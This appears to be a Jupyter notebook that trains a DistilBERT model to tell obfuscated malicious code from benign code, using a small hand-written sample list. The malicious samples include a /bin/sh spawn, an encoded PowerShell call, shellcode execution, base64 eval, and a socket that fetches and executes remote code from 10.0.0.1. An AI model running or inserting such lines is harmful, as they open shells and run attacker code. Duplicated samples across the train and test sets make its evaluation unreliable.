pip install transformers datasets scikit-learn

In [None]:
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from transformers import DistilBertTokenizer, TFDistilBertForSequenceClassification
import tensorflow as tf

 
# 1. Simulate Obfuscated vs. Clean Code
 
def load_dataset():
    malicious = [
        "char*x=strcat(strcpy(malloc(8),\"/bin\"),\"/sh\");execve(x,0,0);",
        "int a=system(\"powershell -enc JABX... \");",
        "unsigned char code[]={0x90,0x90,0x90,...};((void(*)())code)();",
        "eval(base64.b64decode(b'cHJpbnQoIkhlbGxvIik='))",
        "import socket; socket.connect(('10.0.0.1', 6666)); exec(sock.recv(2048))"
    ]

    benign = [
        "def greet(): print(\"Hello World\")",
        "int main() { printf(\"Welcome\"); return 0; }",
        "document.getElementById(\"btn\").addEventListener(\"click\", greet);",
        "System.out.println(\"Login successful\");",
        "#include<stdio.h>\nvoid sum() { int a=2,b=3; printf(\"%d\",a+b); }"
    ]

    texts = malicious * 100 + benign * 100
    labels = [1]*len(malicious)*100 + [0]*len(benign)*100

    return pd.DataFrame({'code': texts, 'label': labels})

 
# 2. Preprocess with Tokenizer
 
def prepare_data(df):
    tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')
    encodings = tokenizer(df['code'].tolist(), truncation=True, padding=True, max_length=128)
    return encodings, tf.convert_to_tensor(df['label'].values), tokenizer

 
# 3. Train Transformer Model
 
def train_model(encodings, labels):
    model = TFDistilBertForSequenceClassification.from_pretrained(
        'distilbert-base-uncased', num_labels=2)

    dataset = tf.data.Dataset.from_tensor_slices((dict(encodings), labels))
    dataset = dataset.shuffle(200).batch(16)

    model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=5e-5),
                  loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
                  metrics=['accuracy'])

    model.fit(dataset, epochs=3)
    return model


In [None]:
def evaluate_model(model, tokenizer, df):
    encodings = tokenizer(df['code'].tolist(), truncation=True, padding=True, max_length=128)
    dataset = tf.data.Dataset.from_tensor_slices(dict(encodings)).batch(16)
    predictions = tf.argmax(model.predict(dataset).logits, axis=1).numpy()
    print("\nClassification Report:\n", classification_report(df['label'], predictions))


In [None]:
if __name__ == "__main__":
    df = load_dataset()
    train_df, test_df = train_test_split(df, test_size=0.2, random_state=42)
    
    encodings, labels, tokenizer = prepare_data(train_df)
    model = train_model(encodings, labels)

    evaluate_model(model, tokenizer, test_df)